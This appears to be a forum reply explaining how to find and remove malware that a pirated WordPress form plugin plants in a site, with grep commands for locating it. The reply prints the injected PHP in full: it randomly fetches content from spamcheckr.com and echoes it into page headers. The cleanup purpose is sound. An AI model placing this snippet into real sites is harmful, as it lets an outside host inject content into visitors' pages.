Good news is you don’t seem to have too many plugins running. If you have a form plugin that you downloaded buy “accidentally” forgot to pay for like formcraft or gravity forms, it’s probably that.
You can check your folders by using a useful little command in the terminal if you have grep (default on macs and many others but not pc). For pc use findstr or download grep. If you don’t have access to these files locally either download them or access them remotely with ssh/telnes
The grep command I use is:
grep -nr 'https://spamcheckr.com/l.php' /www/mysite/wp-content
(Don’t forget to change /www/mysite/wp-content to the location of your wordpress site)
Using -nr options with grep it will output the exact line of the folder and file the code is on.
Unfortunately it will probalby tell you it’s on line one, but when you open the file you’ll notice its a compressed file that is about 250 lines long. No problem though. Just open it with any text editor that has syntax highlighting turned on and look for this code:
if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "https://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}
It will be the only code that shows up highlighted while all other code will remain greyed out because it’s only there to trick you and doesn’t actually do anything. You can then delete that code.
You might also want to check on who added the file in the first place so just use the same grep command that you used above but instead use the name of the file that you found the malicious code in. So if the file name is includes/settings.php run the following in the command line:
grep -nr 'includes/settings.php' /www/mysite/wp-content
Most likely the file was included in the main php script in the plugin root or theme functions.php.
It will look something like this
include 'includes/settings.php';
You’re safe to delete that line, if the file was all garbage code. I’d also look through that page to see if anything else was added that looks suspicious.
You’re safest bet would be to discontinue from using the plugin entirely, but if you really need it you could run through some online virus checkers or just look through the plugin to be extra safe.
Most often these plugins come from sites like wplocker/themeok or other sites that claim they have premium plugins for free. Bottom line is, it’s too good to be true and they want to rip you off so either pay for them or be ready for them to screw with your site.
